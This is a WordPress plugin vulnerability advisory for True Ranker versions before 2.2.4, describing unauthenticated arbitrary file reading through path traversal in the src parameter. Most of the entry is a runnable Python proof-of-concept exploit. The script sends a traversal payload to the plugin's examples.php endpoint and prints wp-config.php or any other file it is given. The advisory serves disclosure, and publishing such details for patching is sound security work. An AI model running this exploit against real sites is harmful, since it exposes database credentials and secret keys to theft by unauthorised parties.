WordPress Plugin Vulnerabilities

True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal

Description

The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.

Proof of Concept

#!/usr/bin/env python3
# Exploit Authors: Nicole Sheinin, Liad Levy
# Tested on: MacOS

import argparse
import requests
import sys

parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter)
group_must = parser.add_argument_group('must arguments')
group_must.add_argument("-u", "--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)", required=True)
parser.add_argument("-p", "--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php", required=False)

args = parser.parse_args()

if len(sys.argv) <= 2:
    print("Exploit Usage: ./exploit.py -h [help] -u [url]")
    sys.exit()

HOST = args.url
PAYLOAD = args.payload

# Vulnerable endpoint, and the traversal path handed to it through the src parameter
url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST)
payload = "/scripts/simple.php/{}".format(PAYLOAD)

r = requests.post(url, data={'src': payload})
if r.status_code == 200:
    print(r.text)
else:
    print("No exploit found")

Affects Plugins

Fixed in 2.2.4

Classification

Type
TRAVERSAL

Miscellaneous

Original Researcher
p7e4
Verified
Yes

Timeline

Publicly Published
2021-12-14
Added
2021-12-15
Last Updated
2022-04-08